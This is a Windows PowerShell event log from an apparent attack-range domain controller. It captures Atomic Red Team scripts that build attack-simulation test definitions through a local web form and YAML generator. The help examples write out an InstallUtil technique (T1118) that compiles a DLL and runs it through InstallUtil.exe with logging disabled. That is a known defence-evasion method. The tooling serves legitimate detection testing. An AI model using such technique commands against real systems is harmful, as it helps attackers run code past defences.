ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467188
Keywords=None
Message=Started invocation of ScriptBlock ID: 5dff6487-0f7c-4e66-96a8-4ad026a61af2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467187
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Start-AtomicGUI {
    param (
        [Int] $port = 8487
    )
    # Install-Module UniversalDashboard if not already installed
    $UDcommunityInstalled = Get-InstalledModule -Name "UniversalDashboard.Community" -ErrorAction:SilentlyContinue
    $UDinstalled = Get-InstalledModule -Name "UniversalDashboard" -ErrorAction:SilentlyContinue
    if (-not $UDcommunityInstalled -and -not $UDinstalled) { 
        Write-Host "Installing UniversalDashboard.Community"
        Install-Module -Name UniversalDashboard.Community -Scope CurrentUser -Force
    }

    ############## Function Definitions Made Available to EndPoints
    function New-UDTextAreaX ($ID, $PlaceHolder) {
        New-UDElement -Tag div -Attributes @{class = "input-field col" } -Content {
            New-UDElement -Tag "textarea" -id  $ID -Attributes @{ class = "materialize-textarea ud-input" }
            New-UDElement -Tag Label -Attributes @{for = $ID } -Content { $PlaceHolder }
        }
    }

    function New-UDTextBoxX ($ID, $PlaceHolder) {
        New-UDElement -Tag div -Attributes @{class = "input-field col" } -Content {
            New-UDElement -Tag "input" -id $ID -Attributes @{ class = "ud-input"; type = "text" }
            New-UDElement -Tag Label -Attributes @{for = $ID } -Content { $PlaceHolder }
        }
    }

    $InputArgCards = @{ }
    function New-InputArgCard {
        $cardNumber = $InputArgCards.count + 1
        $newCard = New-UDCard -ID "InputArgCard$cardNumber" -Content {
            New-UDTextBoxX "InputArgCard$cardNumber-InputArgName" "Input Argument Name"
            New-UDTextAreaX "InputArgCard$cardNumber-InputArgDescription" "Description"        
            New-UDTextBoxX "InputArgCard$cardNumber-InputArgDefault" "Default Value" 
            New-UDLayout -columns 4 {
                New-UDSelect -ID "InputArgCard$cardNumber-InputArgType" -Label "Type" -Option {
                    New-UDSelectOption -Name "Path" -Value "path"
                    New-UDSelectOption -Name "String" -Value "string"
                    New-UDSelectOption -Name "Url" -Value "url"
                    New-UDSelectOption -Name "Integer" -Value "integer"
                }
            }
            New-UDButton -Text "Remove this Input Argument"  -OnClick (
                New-UDEndpoint -Endpoint {
                    Remove-UDElement -Id "InputArgCard$cardNumber"
                    $inputArgCards["InputArgCard$cardNumber"] = $true
                } -ArgumentList @($cardNumber, $inputArgCards)
            )
        }
        $InputArgCards.Add("InputArgCard$cardNumber", $false) | Out-Null
        $newCard
    }

    $depCards = @{ }
    function New-depCard {
        $cardNumber = $depCards.count + 1
        $newCard = New-UDCard -ID "depCard$cardNumber" -Content {
            New-UDTextBoxX "depCard$cardNumber-depDescription" "Prereq Description"
            New-UDTextAreaX "depCard$cardNumber-prereqCommand" "Check prereqs Command"        
            New-UDTextAreaX "depCard$cardNumber-getPrereqCommand" "Get Prereqs Command"        
            New-UDButton -Text "Remove this Prereq"  -OnClick (
                New-UDEndpoint -Endpoint {
                    Remove-UDElement -Id "depCard$cardNumber"
                    $depCards["depCard$cardNumber"] = $true
                } -ArgumentList @($cardNumber, $depCards)
            )
        }
        $depCards.Add("depCard$cardNumber", $false) | Out-Null
        $newCard
    }

    function New-UDSelectX ($Id, $Label) {
        New-UDSelect -Label $Label -Id $Id -Option {
            New-UDSelectOption -Name "PowerShell" -Value "PowerShell" -Selected
            New-UDSelectOption -Name "Command Prompt" -Value "CommandPrompt" 
            New-UDSelectOption -Name "Bash" -Value "Bash"
            New-UDSelectOption -Name "Sh" -Value "Sh"
        }
    }

    ############## End Function Definitions Made Available to EndPoints

    # EndpointInitialization defining which methods, modules, and variables will be available for use within an endpoint
    $ei = New-UDEndpointInitialization `
        -Function @("New-InputArgCard", "New-depCard", "New-UDTextAreaX", "New-UDTextBoxX", "New-UDSelectX") `
        -Variable @("InputArgCards", "depCards", "yaml") `
        -Module @("..\Invoke-AtomicRedTeam.psd1")

    ############## EndPoint (ep) Definitions: Dynamic code called to generate content for an element or perfrom onClick actions
    $BuildAndDisplayYamlScriptBlock = {   
        $testName = (Get-UDElement -Id atomicName).Attributes['value']
        $testDesc = (Get-UDElement -Id atomicDescription).Attributes['value']
        $platforms = @()
        if ((Get-UDElement -Id spWindows).Attributes['checked']) { $platforms += "Windows" }
        if ((Get-UDElement -Id spLinux).Attributes['checked']) { $platforms += "Linux" }
        if ((Get-UDElement -Id spMacOS).Attributes['checked']) { $platforms += "macOS" }
        $attackCommands = (Get-UDElement -Id attackCommands).Attributes['value']
        $executor = (Get-UDElement -Id executorSelector).Attributes['value']
        $elevationRequired = (Get-UDElement -Id elevationRequired).Attributes['checked']
        $cleanupCommands = (Get-UDElement -Id cleanupCommands).Attributes['value']
        if ("" -eq $executor) { $executor = "PowerShell" }
        # input args
        $inputArgs = @()
        $InputArgCards.GetEnumerator() | ForEach-Object {
            if ($_.Value -eq $false) {
                # this was not deleted
                $prefix = $_.key
                $InputArgName = (Get-UDElement -Id "$prefix-InputArgName").Attributes['value']
                $InputArgDescription = (Get-UDElement -Id "$prefix-InputArgDescription").Attributes['value']
                $InputArgDefault = (Get-UDElement -Id "$prefix-InputArgDefault").Attributes['value']
                $InputArgType = (Get-UDElement -Id "$prefix-InputArgType").Attributes['value']
                if ("" -eq $InputArgType) { $InputArgType = "String" }
                $NewInputArg = New-AtomicTestInputArgument -Name $InputArgName -Description $InputArgDescription -Type $InputArgType -Default $InputArgDefault -WarningVariable +warnings
                $inputArgs += $NewInputArg
            }
        }
        # dependencies
        $dependencies = @()
        $preReqEx = ""
        $depCards.GetEnumerator() | ForEach-Object {
            if ($_.Value -eq $false) {
                # a value of true means the card was deleted, so only add dependencies from non-deleted cards
                $prefix = $_.key
                $depDescription = (Get-UDElement -Id "$prefix-depDescription").Attributes['value']
                $prereqCommand = (Get-UDElement -Id "$prefix-prereqCommand").Attributes['value']
                $getPrereqCommand = (Get-UDElement -Id "$prefix-getPrereqCommand").Attributes['value']
                $preReqEx = (Get-UDElement -Id "preReqEx").Attributes['value']
                if ("" -eq $preReqEx) { $preReqEx = "PowerShell" }
                $NewDep = New-AtomicTestDependency -Description $depDescription -PrereqCommand $prereqCommand -GetPrereqCommand $getPrereqCommand -WarningVariable +warnings
                $dependencies += $NewDep
            }
        }
        $depParams = @{ }
        if ($dependencies.count -gt 0) {
            $depParams.add("DependencyExecutorType", $preReqEx)
            $depParams.add("Dependencies", $dependencies)
        }
        if (($cleanupCommands -ne "") -and ($null -ne $cleanupCommands)) { $depParams.add("ExecutorCleanupCommand", $cleanupCommands) }
        $depParams.add("ExecutorElevationRequired", $elevationRequired)

        $AtomicTest = New-AtomicTest -Name $testName -Description $testDesc -SupportedPlatforms $platforms -InputArguments $inputArgs -ExecutorType $executor -ExecutorCommand $attackCommands -WarningVariable +warnings @depParams                                           
        $yaml = ($AtomicTest | ConvertTo-Yaml) -replace "^", "- " -replace "`n", "`n  "
        foreach ($warning in $warnings) { Show-UDToast $warning -BackgroundColor LightYellow -Duration 10000 }
        New-UDElement -ID yaml -Tag pre -Content { $yaml }
    } 

    $epYamlModal = New-UDEndpoint -Endpoint {
        Show-UDModal -Header { New-UDHeading -Size 3 -Text "Test Definition YAML" } -Content {
            new-udrow -endpoint $BuildAndDisplayYamlScriptBlock
            # Left arrow button (decrease indentation)
            New-UDButton -Icon arrow_circle_left -OnClick (
                New-UDEndpoint -Endpoint {
                    $yaml = (Get-UDElement -Id "yaml").Content[0]
                    if (-not $yaml.startsWith("- ")) {
                        Set-UDElement -Id "yaml" -Content {
                            $yaml -replace "^  ", "" -replace "`n  ", "`n"
                        }
                    }
                }
            )
            # Right arrow button (increase indentation)
            New-UDButton -Icon arrow_circle_right -OnClick (
                New-UDEndpoint -Endpoint {
                    $yaml = (Get-UDElement -Id "yaml").Content[0]
                    Set-UDElement -Id "yaml" -Content {
                        $yaml -replace "^", "  " -replace "`n", "`n  "
                    }
                }
            )
            # Copy Yaml to clipboard
            New-UDButton -Text "Copy" -OnClick (
                New-UDEndpoint -Endpoint {
                    $yaml = (Get-UDElement -Id "yaml").Content[0]
                    Set-UDClipboard -Data $yaml
                    Show-UDToast -Message "Copied YAML to the Clipboard" -BackgroundColor YellowGreen 
                }
            )
        }
    }

    $epFillTestData = New-UDEndpoint -Endpoint {
        Add-UDElement -ParentId "inputCard" -Content { New-InputArgCard }        
        Add-UDElement -ParentId "depCard"   -Content { New-depCard }
        Start-Sleep 1
        Set-UDElement -Id atomicName -Attributes @{value = "My new atomic" }
        Set-UDElement -Id atomicDescription -Attributes @{value = "This is the atomic description" }
        Set-UDElement -Id attackCommands -Attributes @{value = "echo this`necho that" }
        Set-UDElement -Id cleanupCommands -Attributes @{value = "cleanup commands here`nand here..." }
        # InputArgs
        $cardNumber = 1
        Set-UDElement -Id "InputArgCard$cardNumber-InputArgName" -Attributes @{value = "input_arg_1" }
        Set-UDElement -Id "InputArgCard$cardNumber-InputArgDescription" -Attributes @{value = "InputArg1 description" }        
        Set-UDElement -Id "InputArgCard$cardNumber-InputArgDefault" -Attributes @{value = "this is the default value" }        
        # dependencies
        Set-UDElement -Id "depCard$cardNumber-depDescription" -Attributes @{value = "This file must exist" }
        Set-UDElement -Id "depCard$cardNumber-prereqCommand" -Attributes @{value = "if (this) then that" }       
        Set-UDElement -Id "depCard$cardNumber-getPrereqCommand" -Attributes @{value = "iwr" }       
        
    }
    ############## End EndPoint (ep) Definitions

    ############## Static Definitions
    $supportedPlatforms = New-UDLayout -Columns 4 {
        New-UDElement -Tag Label -Attributes @{ style = @{"font-size" = "15px" } } -Content { "Supported Platforms:" } 
        New-UDCheckbox -FilledIn -Label "Windows" -Checked -Id spWindows
        New-UDCheckbox -FilledIn -Label "Linux" -Id spLinux
        New-UDCheckbox -FilledIn -Label "macOS"-Id spMacOS
    }

    $executorRow = New-UDLayout -Columns 4 {
        New-UDSelectX 'executorSelector' "Executor for Attack Commands"
        New-UDCheckbox -ID elevationRequired -FilledIn -Label "Requires Elevation to Execute Successfully?" 
    }

    $genarateYamlButton = New-UDRow -Columns {
        New-UDColumn -Size 8 -Content { }
        New-UDColumn -Size 4 -Content {
            New-UDButton -Text "Generate Test Definition YAML" -OnClick ( $epYamlModal )
        }
    }

    ############## End Static Definitions

    ############## The Dashboard
    $idleTimeOut = New-TimeSpan -Minutes 10080
    $db = New-UDDashboard -Title "Atomic Test Creation" -IdleTimeout $idleTimeOut -EndpointInitialization $ei -Content {
        New-UDCard -Id "mainCard" -Content {
            New-UDCard -Content {
                New-UDTextBoxX 'atomicName' "Atomic Test Name"
                New-UDTextAreaX "atomicDescription" "Atomic Test Description"
                $supportedPlatforms
                New-UDTextAreaX "attackCommands" "Attack Commands"
                $executorRow
                New-UDTextAreaX "cleanupCommands" "Cleanup Commands (Optional)"
                $genarateYamlButton  
            }

            # input args
            New-UDCard -Id "inputCard" -Endpoint {
                New-UDButton -Text "Add Input Argument (Optional)" -OnClick (
                    New-UDEndpoint -Endpoint { Add-UDElement -ParentId "inputCard" -Content { New-InputArgCard } }
                )
            }

            # prereqs
            New-UDCard -Id "depCard" -Endpoint {
                New-UDLayout -columns 4 {
                    New-UDButton -Text "Add Prerequisite (Optional)" -OnClick (
                        New-UDEndpoint -Endpoint { Add-UDElement -ParentId "depCard" -Content { New-depCard } }
                    )
                    New-UDSelectX 'preReqEx' "Executor for Prereq Commands" 
                }
            }   
        }

        # button to fill form with test data for development purposes
        if ($false) { New-UDButton -Text "Fill Test Data" -OnClick ( $epFillTestData ) }
    }
    ############## End of the Dashboard

    Stop-AtomicGUI
    Start-UDDashboard -port $port -Dashboard $db -Name "AtomicGUI" -ListenAddress 127.0.0.1
    start-process http://localhost:$port
}

function Stop-AtomicGUI {
    Get-UDDashboard -Name 'AtomicGUI' | Stop-UDDashboard
    Write-Host "Stopped all AtomicGUI Dashboards"
}

ScriptBlock ID: 5dff6487-0f7c-4e66-96a8-4ad026a61af2
Path: C:\AtomicRedTeam\invoke-atomicredteam\Public\Start-AtomicGUI.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467186
Keywords=None
Message=Completed invocation of ScriptBlock ID: 699f8b52-9f17-4941-9ffd-13c6a5c99132
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467185
Keywords=None
Message=Started invocation of ScriptBlock ID: 699f8b52-9f17-4941-9ffd-13c6a5c99132
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467184
Keywords=None
Message=Creating Scriptblock text (1 of 1):
# The class definitions that these functions rely upon are located in Private\AtomicClassSchema.ps1

function New-AtomicTechnique {
    <#
.SYNOPSIS

Specifies a new atomic red team technique. The output of this function is designed to be piped directly to ConvertTo-Yaml, eliminating the need to work with YAML directly.

.PARAMETER AttackTechnique

Specifies one or more MITRE ATT&CK techniques that to which this technique applies. Per MITRE naming convention, an attack technique should start with "T" followed by a 4 digit number. The MITRE sub-technique format is also supported: TNNNN.NNN

.PARAMETER DisplayName

Specifies the name of the technique as defined by ATT&CK. Example: 'Audio Capture'

.PARAMETER AtomicTests

Specifies one or more atomic tests. Atomic tests are created using the New-AtomicTest function.

.EXAMPLE

$InputArg1 = New-AtomicTestInputArgument -Name filename -Description 'location of the payload' -Type Path -Default 'PathToAtomicsFolder\T1118\src\T1118.dll'
$InputArg2 = New-AtomicTestInputArgument -Name source -Description 'location of the source code to compile' -Type Path -Default 'PathToAtomicsFolder\T1118\src\T1118.cs'

$AtomicTest1 = New-AtomicTest -Name 'InstallUtil uninstall method call' -Description 'Executes the Uninstall Method' -SupportedPlatforms Windows -InputArguments @($InputArg1, $InputArg2) -ExecutorType CommandPrompt -ExecutorCommand @'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:#{filename}  #{source}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U #{filename}
'@

# Note: the input arguments are identical for atomic test #1 and #2
$AtomicTest2 = New-AtomicTest -Name 'InstallUtil GetHelp method call' -Description 'Executes the Help property' -SupportedPlatforms Windows -InputArguments @($InputArg1, $InputArg2) -ExecutorType CommandPrompt -ExecutorCommand @'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:#{filename} #{source}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? #{filename}
'@

$AtomicTechnique = New-AtomicTechnique -AttackTechnique T1118 -DisplayName InstallUtil -AtomicTests $AtomicTest1, $AtomicTest2

# Everything is ready to convert to YAML now!
$AtomicTechnique | ConvertTo-Yaml | Out-File T1118.yaml

.OUTPUTS

AtomicTechnique

Outputs an object representing an atomic technique.

The output of New-AtomicTechnique is designed to be piped to ConvertTo-Yaml.
#>

    [CmdletBinding()]
    [OutputType([AtomicTechnique])]
    param (
        [Parameter(Mandatory)]
        [String[]]
        $AttackTechnique,

        [Parameter(Mandatory)]
        [String]
        [ValidateNotNullOrEmpty()]
        $DisplayName,

        [Parameter(Mandatory)]
        [AtomicTest[]]
        [ValidateNotNull()]
        $AtomicTests
    )

    $AtomicTechniqueInstance = [AtomicTechnique]::new()

    foreach ($Technique in $AttackTechnique) {
        # Attack techniques should match the MITRE ATT&CK [sub-]technique format.
        # This is not a requirement so just warn the user.
        if ($Technique -notmatch '^(?-i:T\d{4}(\.\d{3}){0,1})$') {
            Write-Warning "The following supplied attack technique does not start with 'T' followed by a four digit number: $Technique"
        }
    }

    $AtomicTechniqueInstance.attack_technique = $AttackTechnique
    $AtomicTechniqueInstance.display_name = $DisplayName
    $AtomicTechniqueInstance.atomic_tests = $AtomicTests

    return $AtomicTechniqueInstance
}

function New-AtomicTest {
    <#
.SYNOPSIS

Specifies an atomic test.

.PARAMETER Name

Specifies the name of the test that indicates how it tests the technique.

.PARAMETER Description

Specifies a long form description of the test. Markdown is supported.

.PARAMETER SupportedPlatforms

Specifies the OS/platform on which the test is designed to run. The following platforms are currently supported: Windows, macOS, Linux.

A single test can support multiple platforms.

.PARAMETER ExecutorType

Specifies the the framework or application in which the test should be executed. The following executor types are currently supported: CommandPrompt, Sh, Bash, PowerShell.

- CommandPrompt: The Windows Command Prompt, aka cmd.exe
  Requires the -ExecutorCommand argument to contain a multi-line script that will be preprocessed and then executed by cmd.exe.

- PowerShell: PowerShell
  Requires the -ExecutorCommand argument to contain a multi-line PowerShell scriptblock that will be preprocessed and then executed by powershell.exe

- Sh: Linux's bourne shell
  Requires the -ExecutorCommand argument to contain a multi-line script that will be preprocessed and then executed by sh.

- Bash: Linux's bourne again shell
  Requires the -ExecutorCommand argument to contain a multi-line script that will be preprocessed and then executed by bash.

.PARAMETER ExecutorElevationRequired

Specifies that the test must run with elevated privileges.

.PARAMETER ExecutorSteps

Specifies a manual list of steps to execute. This should be specified when the atomic test cannot be executed in an automated fashion, for example when GUI steps are involved that cannot be automated.

.PARAMETER ExecutorCommand

Specifies the command to execute as part of the atomic test. This should be specified when the atomic test can be executed in an automated fashion.

The -ExecutorType specified will dictate the command specified, e.g. PowerShell scriptblock code when the "PowerShell" ExecutorType is specified.

.PARAMETER ExecutorCleanupCommand

Specifies the command to execute if there are any artifacts that need to be cleaned up.

.PARAMETER InputArguments

Specifies one or more input arguments. Input arguments are defined using the New-AtomicTestInputArgument function.

.PARAMETER DependencyExecutorType

Specifies an override execution type for dependencies. By default, dependencies are executed using the framework specified in -ExecutorType.

In most cases, 'PowerShell' is specified as a dependency executor type when 'CommandPrompt' is specified as an executor type.

.PARAMETER Dependencies

Specifies one or more dependencies. Dependencies are defined using the New-AtomicTestDependency function.

.EXAMPLE

$InputArg1 = New-AtomicTestInputArgument -Name filename -Description 'location of the payload' -Type Path -Default 'PathToAtomicsFolder\T1118\src\T1118.dll'
$InputArg2 = New-AtomicTestInputArgument -Name source -Description 'location of the source code to compile' -Type Path -Default 'PathToAtomicsFolder\T1118\src\T1118.cs'

$AtomicTest = New-AtomicTest -Name 'InstallUtil uninstall method call' -Description 'Executes the Uninstall Method' -SupportedPlatforms Windows -InputArguments $InputArg1, $InputArg2 -ExecutorType CommandPrompt -ExecutorCommand @'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:#{filename}  #{source}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U #{filename}
'@

.OUTPUTS

AtomicTest

Outputs an object representing an atomic test. This object is intended to be supplied to the New-AtomicTechnique -AtomicTests parameter.

The output of New-AtomicTest can be piped to ConvertTo-Yaml. The resulting output can be added to an existing atomic technique YAML doc.
#>

    [CmdletBinding(DefaultParameterSetName = 'AutomatedExecutor')]
    [OutputType([AtomicTest])]
    param (
        [Parameter(Mandatory)]
        [String]
        [ValidateNotNullOrEmpty()]
        $Name,

        [Parameter(Mandatory)]
        [String]
        [ValidateNotNullOrEmpty()]
        $Description,

        [Parameter(Mandatory)]
        [String[]]
        [ValidateSet('Windows', 'macOS', 'Linux')]
        $SupportedPlatforms,

        [Parameter(Mandatory, ParameterSetName = 'AutomatedExecutor')]
        [String]
        [ValidateSet('CommandPrompt', 'Sh', 'Bash', 'PowerShell')]
        $ExecutorType,

        [Switch]
        $ExecutorElevationRequired,

        [Parameter(Mandatory, ParameterSetName = 'ManualExecutor')]
        [String]
        [ValidateNotNullOrEmpty()]
        $ExecutorSteps,

        [Parameter(Mandatory, ParameterSetName = 'AutomatedExecutor')]
        [String]
        [ValidateNotNullOrEmpty()]
        $ExecutorCommand,

        [String]
        [ValidateNotNullOrEmpty()]
        $ExecutorCleanupCommand,

        [AtomicInputArgument[]]
        $InputArguments,

        [String]
        [ValidateSet('CommandPrompt', 'Sh', 'Bash', 'PowerShell')]
        $DependencyExecutorType,

        [AtomicDependency[]]
        $Dependencies
    )

    $AtomicTestInstance = [AtomicTest]::new()

    $AtomicTestInstance.name = $Name
    $AtomicTestInstance.description = $Description
    $AtomicTestInstance.supported_platforms = $SupportedPlatforms | ForEach-Object { $_.ToLower() }

    $StringsWithPotentialInputArgs = New-Object -TypeName 'System.Collections.Generic.List`1[String]'

    switch ($PSCmdlet.ParameterSetName) {
        'AutomatedExecutor' {
            $ExecutorInstance = [AtomicExecutorDefault]::new()
            $ExecutorInstance.command = $ExecutorCommand
            $StringsWithPotentialInputArgs.Add($ExecutorCommand)
        }

        'ManualExecutor' {
            $ExecutorInstance = [AtomicExecutorManual]::new()
            $ExecutorInstance.steps = $ExecutorSteps
            $StringsWithPotentialInputArgs.Add($ExecutorSteps)
        }
    }

    switch ($ExecutorType) {
        'CommandPrompt' { $ExecutorInstance.name = 'command_prompt' }
        default { $ExecutorInstance.name = $ExecutorType.ToLower() }
    }

    if ($ExecutorCleanupCommand) {
        $ExecutorInstance.cleanup_command = $ExecutorCleanupCommand
        $StringsWithPotentialInputArgs.Add($ExecutorCleanupCommand)
    }

    if ($ExecutorElevationRequired) { $ExecutorInstance.elevation_required = $True }

    if ($Dependencies) {
        foreach ($Dependency in $Dependencies) {
            $StringsWithPotentialInputArgs.Add($Dependency.description)
            $StringsWithPotentialInputArgs.Add($Dependency.prereq_command)
            $StringsWithPotentialInputArgs.Add($Dependency.get_prereq_command)
        }
    }

    if ($DependencyExecutorType) { 
        switch ($DependencyExecutorType) {
            'CommandPrompt' { $AtomicTestInstance.dependency_executor_name = 'command_prompt' }
            default { $AtomicTestInstance.dependency_executor_name = $DependencyExecutorType.ToLower() }
        }
    }    $AtomicTestInstance.dependencies = $Dependencies

    [Hashtable] $InputArgHashtable = @{ }

    if ($InputArguments.Count) {
        # Determine if any of the input argument names repeat. They must be unique.
        $InputArguments | Group-Object -Property Name | Where-Object { $_.Count -gt 1 } | ForEach-Object {
            Write-Error "There are $($_.Count) instances of the $($_.Name) input argument. Input argument names must be unique."
            return
        }

        # Convert each input argument to a hashtable where the key is the Name property.

        foreach ($InputArg in $InputArguments) {
            # Create a copy of the passed input argument that doesn't include the "Name" property.
            # Passing in a shallow copy adversely affects YAML serialization for some reason.
            $NewInputArg = [AtomicInputArgument]::new()
            $NewInputArg.default = $InputArg.default
            $NewInputArg.description = $InputArg.description
            $NewInputArg.type = $InputArg.type

            $InputArgHashtable[$InputArg.Name] = $NewInputArg
        }

        $AtomicTestInstance.input_arguments = $InputArgHashtable
    }

    # Extract all specified input arguments from executor and any dependencies.
    $Regex = [Regex] '#\{(?<ArgName>[^}]+)\}'
    [String[]] $InputArgumentNamesFromExecutor = $StringsWithPotentialInputArgs |
    ForEach-Object { $Regex.Matches($_) } |
    Select-Object -ExpandProperty Groups |
    Where-Object { $_.Name -eq 'ArgName' } |
    Select-Object -ExpandProperty Value |
    Sort-Object -Unique


    # Validate that all executor arguments are defined as input arguments
    if ($InputArgumentNamesFromExecutor.Count) {
        $InputArgumentNamesFromExecutor | ForEach-Object {
            if ($InputArgHashtable.Keys -notcontains $_) {
                Write-Error "The following input argument was specified but is not defined: '$_'"
                return
            }
        }
    }

    # Validate that all defined input args are utilized at least once in the executor.
    if ($InputArgHashtable.Keys.Count) {
        $InputArgHashtable.Keys | ForEach-Object {
            if ($InputArgumentNamesFromExecutor -notcontains $_) {
                # Write a warning since this scenario is not considered a breaking change
                Write-Warning "The following input argument is defined but not utilized: '$_'."
            }
        }
    }

    $AtomicTestInstance.executor = $ExecutorInstance

    return $AtomicTestInstance
}

function New-AtomicTestDependency {
    <#
.SYNOPSIS

Specifies a new dependency that must be met prior to execution of an atomic test.

.PARAMETER Description

Specifies a human-readable description of the dependency. This should be worded in the following form: SOMETHING must SOMETHING

.PARAMETER PrereqCommand

Specifies commands to check if prerequisites for running this test are met.

For the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met.

For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.

.PARAMETER GetPrereqCommand

Specifies commands to meet this prerequisite or a message describing how to meet this prereq

More specifically, this command is designed to satisfy either of the following conditions:

1) If a prerequisite is not met, perform steps necessary to satify the prerequisite. Such a command should be implemented when prerequisites can be satisfied in an automated fashion.
2) If a prerequisite is not met, inform the user what the steps are to satisfy the prerequisite. Such a message should be presented to the user in the case that prerequisites cannot be satisfied in an automated fashion.

.EXAMPLE

$Dependency = New-AtomicTestDependency -Description 'Folder to zip must exist (#{input_file_folder})' -PrereqCommand 'test -e #{input_file_folder}' -GetPrereqCommand 'echo Please set input_file_folder argument to a folder that exists'

.OUTPUTS

AtomicDependency

Outputs an object representing an atomic test dependency. This object is intended to be supplied to the New-AtomicTest -Dependencies parameter.

Note: due to a bug in PowerShell classes, the get_prereq_command property will not display by default. If all fields must be explicitly displayed, they can be viewed by piping output to "Select-Object description, prereq_command, get_prereq_command".
#>

    [CmdletBinding()]
    [OutputType([AtomicDependency])]
    param (
        [Parameter(Mandatory)]
        [String]
        [ValidateNotNullOrEmpty()]
        $Description,

        [Parameter(Mandatory)]
        [String]
        [ValidateNotNullOrEmpty()]
        $PrereqCommand,

        [Parameter(Mandatory)]
        [String]
        [ValidateNotNullOrEmpty()]
        $GetPrereqCommand
    )

    $DependencyInstance = [AtomicDependency]::new()

    $DependencyInstance.description = $Description
    $DependencyInstance.prereq_command = $PrereqCommand
    $DependencyInstance.get_prereq_command = $GetPrereqCommand

    return $DependencyInstance
}

function New-AtomicTestInputArgument {
    <#
.SYNOPSIS

Specifies an input to an atomic test that is a requirement to run the test (think of these like function arguments).

.PARAMETER Name

Specifies the name of the input argument. This must be lowercase and can optionally, have underscores. The input argument name is what is specified as arguments within executors and dependencies.

.PARAMETER Description

Specifies a human-readable description of the input argument.

.PARAMETER Type

Specifies the data type of the input argument. The following data types are supported: Path, Url, String, Integer, Float. If an alternative data type must be supported, use the -TypeOverride parameter.

.PARAMETER TypeOverride

Specifies an unsupported input argument data type. Specifying this parameter should not be common.

.PARAMETER Default

Specifies a default value for an input argument if one is not specified via the Invoke-AtomicTest -InputArgs parameter.

.EXAMPLE

$AtomicInputArgument = New-AtomicTestInputArgument -Name 'rar_exe' -Type Path -Description 'The RAR executable from Winrar' -Default '%programfiles%\WinRAR\Rar.exe'

.OUTPUTS

AtomicInputArgument

Outputs an object representing an atomic test input argument. This object is intended to be supplied to the New-AtomicTest -InputArguments parameter.
#>

    [CmdletBinding(DefaultParameterSetName = 'PredefinedType')]
    [OutputType([AtomicInputArgument])]
    param (
        [Parameter(Mandatory)]
        [String]
        [ValidateNotNullOrEmpty()]
        $Name,

        [Parameter(Mandatory)]
        [String]
        [ValidateNotNullOrEmpty()]
        $Description,

        [Parameter(Mandatory, ParameterSetName = 'PredefinedType')]
        [String]
        [ValidateSet('Path', 'Url', 'String', 'Integer', 'Float')]
        $Type,

        [Parameter(Mandatory, ParameterSetName = 'TypeOverride')]
        [String]
        [ValidateNotNullOrEmpty()]
        $TypeOverride,

        [Parameter(Mandatory)]
        [String]
        [ValidateNotNullOrEmpty()]
        $Default
    )

    if ($Name -notmatch '^(?-i:[0-9a-z_]+)$') {
        Write-Error "Input argument names must be lowercase and optionally, contain underscores. Input argument name supplied: $Name"
        return
    }

    $AtomicInputArgInstance = [AtomicInputArgument]::new()

    $AtomicInputArgInstance.description = $Description
    $AtomicInputArgInstance.default = $Default

    if ($Type) {
        $AtomicInputArgInstance.type = $Type

        # Validate input argument types when it makes sense to do so.
        switch ($Type) {
            'Url' {
                if (-not [Uri]::IsWellFormedUriString($Type, [UriKind]::RelativeOrAbsolute)) {
                    Write-Warning "The specified Url is not properly formatted: $Type"
                }
            }

            'Integer' {
                if (-not [Int]::TryParse($Type, [Ref] $null)) {
                    Write-Warning "The specified Int is not properly formatted: $Type"
                }
            }

            'Float' {
                if (-not [Double]::TryParse($Type, [Ref] $null)) {
                    Write-Warning "The specified Float is not properly formatted: $Type"
                }
            }

            # The following supported data types do not make sense to validate:
            # 'Path' { }
            # 'String' { }
        }
    }
    else {
        $AtomicInputArgInstance.type = $TypeOverride
    }

    # Add Name as a note property since the Name property cannot be defined in the AtomicInputArgument
    # since it must be stored as a hashtable where the name is the key. Fortunately, ConvertTo-Yaml
    # won't convert note properties during serialization.
    $InputArgument = Add-Member -InputObject $AtomicInputArgInstance -MemberType NoteProperty -Name Name -Value $Name -PassThru

    return $InputArgument
}


ScriptBlock ID: 699f8b52-9f17-4941-9ffd-13c6a5c99132
